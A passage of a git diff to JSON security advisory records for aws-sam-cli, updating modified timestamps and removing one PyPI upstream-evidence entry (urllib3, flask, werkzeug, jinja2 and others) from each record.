+2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2018-25091", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json b/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json index 5a0b2be9439..ab5b99ed1b3 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-1010083.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-1010083", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5wv5-4vpf-pj6m", "CVE-2019-1010083", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-10906.json b/advisories/BREW-aws-sam-cli-CVE-2019-10906.json index 6b47b4af660..f9ee19c97aa 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-10906.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-10906", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-11236.json b/advisories/BREW-aws-sam-cli-CVE-2019-11236.json index 7cd985c30f3..deb9ddb71de 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-11236.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-11236", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-11324.json b/advisories/BREW-aws-sam-cli-CVE-2019-11324.json index 299948c4814..961b39a2e15 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-11324.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-11324", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-14322.json b/advisories/BREW-aws-sam-cli-CVE-2019-14322.json index f738c4b4bec..76e687302ef 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-14322.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-14322.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-14322", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-j544-7q9p-6xp8", "CVE-2019-14322", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-14806.json b/advisories/BREW-aws-sam-cli-CVE-2019-14806.json index 9763b3c5062..16171c0b6af 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-14806.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-14806.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-14806", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gq9m-qvpx-68hc", "CVE-2019-14806", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-20477.json b/advisories/BREW-aws-sam-cli-CVE-2019-20477.json index dd81e7c5617..d658bdb4b82 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-20477.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-20477", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-14343.json b/advisories/BREW-aws-sam-cli-CVE-2020-14343.json index 3f83ce8a38f..1e0a5714e9b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-14343.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-14343", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-1747.json b/advisories/BREW-aws-sam-cli-CVE-2020-1747.json index 26ee7eea319..38b53d0cb32 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-1747.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-1747", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-26137.json b/advisories/BREW-aws-sam-cli-CVE-2020-26137.json index 777a679c1b2..02490ed81fa 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-26137.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-26137", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-28493.json b/advisories/BREW-aws-sam-cli-CVE-2020-28493.json index 7066cf933a2..187c1df09c2 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-28493.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-28493", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-28724.json b/advisories/BREW-aws-sam-cli-CVE-2020-28724.json index f716a076eed..329b3fe85c0 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-28724.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-28724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-28724", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-3p3h-qghp-hvh2", "CVE-2020-28724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-7212.json b/advisories/BREW-aws-sam-cli-CVE-2020-7212.json index 164cc9a9e11..b9a7f2d5961 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-7212.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-7212", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-20270.json b/advisories/BREW-aws-sam-cli-CVE-2021-20270.json index 8ba5d66fb34..b800d73fb76 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-20270.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-20270", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-27291.json b/advisories/BREW-aws-sam-cli-CVE-2021-27291.json index b8feffdc521..1a897f592ad 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-27291.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-27291", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-28363.json b/advisories/BREW-aws-sam-cli-CVE-2021-28363.json index d16f7e5f9a7..10065d3d61f 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-28363.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-28363", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-29063.json b/advisories/BREW-aws-sam-cli-CVE-2021-29063.json index 168add98f7b..93356184b5f 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-29063.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-29063.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-29063", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f865-m6cq-j9vx", "CVE-2021-29063", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mpmath", - "subject_version": "1.3.0", - "key": "pkg:pypi/mpmath@1.3.0", - "resource": "mpmath" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-33503.json b/advisories/BREW-aws-sam-cli-CVE-2021-33503.json index 36ebe7cb140..01bef3aff93 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-33503.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-33503", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-24065.json b/advisories/BREW-aws-sam-cli-CVE-2022-24065.json index c7ad0529663..eed515f5464 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-24065.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-24065.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-24065", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f4q6-9qm4-h8j4", "CVE-2022-24065", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cookiecutter", - "subject_version": "2.7.1", - "key": "pkg:pypi/cookiecutter@2.7.1", - "resource": "cookiecutter" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40896.json b/advisories/BREW-aws-sam-cli-CVE-2022-40896.json index cef4519e14e..f2101f1e243 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40896.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40896", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40897.json b/advisories/BREW-aws-sam-cli-CVE-2022-40897.json index 94fa6deb0bd..747bd19cbf8 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40897.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40897", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40898.json b/advisories/BREW-aws-sam-cli-CVE-2022-40898.json index 993a1eaafbb..b5cd1799443 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40898.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40898.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40898", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-qwmp-2cf2-g9g6", "CVE-2022-40898", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-23934.json b/advisories/BREW-aws-sam-cli-CVE-2023-23934.json index 754e8fd99b0..534124cc486 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-23934.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-23934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-23934", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-px8h-6qxv-m22q", "CVE-2023-23934", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-25577.json b/advisories/BREW-aws-sam-cli-CVE-2023-25577.json index fa7cf0e66ee..7a6155c9747 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-25577.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-25577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-25577", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-xg9f-g7g7-2323", "CVE-2023-25577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-26302.json b/advisories/BREW-aws-sam-cli-CVE-2023-26302.json index 4ef8c704a16..1a75ecb4f29 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-26302.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-26302", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-26303.json b/advisories/BREW-aws-sam-cli-CVE-2023-26303.json index 4cc58539a44..5b35ddaaada 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-26303.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-26303", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-30861.json b/advisories/BREW-aws-sam-cli-CVE-2023-30861.json index 4fccb9a130e..4055468950d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-30861.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-30861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-30861", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-m2qf-hxjv-5gpq", "CVE-2023-30861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-32681.json b/advisories/BREW-aws-sam-cli-CVE-2023-32681.json index e2794f671b8..3f617c0cc5b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-32681.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-32681", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-43804.json b/advisories/BREW-aws-sam-cli-CVE-2023-43804.json index b0361999078..333d327afe4 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-43804.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-43804", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-45803.json b/advisories/BREW-aws-sam-cli-CVE-2023-45803.json index 5ea966f9e79..058123067c5 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-45803.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-45803", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-46136.json b/advisories/BREW-aws-sam-cli-CVE-2023-46136.json index 9d4e1829afd..0df5c827768 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-46136.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-46136.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-46136", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hrfv-mqp8-q5rw", "CVE-2023-46136", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-22195.json b/advisories/BREW-aws-sam-cli-CVE-2024-22195.json index c6b77d92bf8..01c8a48c8ad 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-22195.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-22195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": 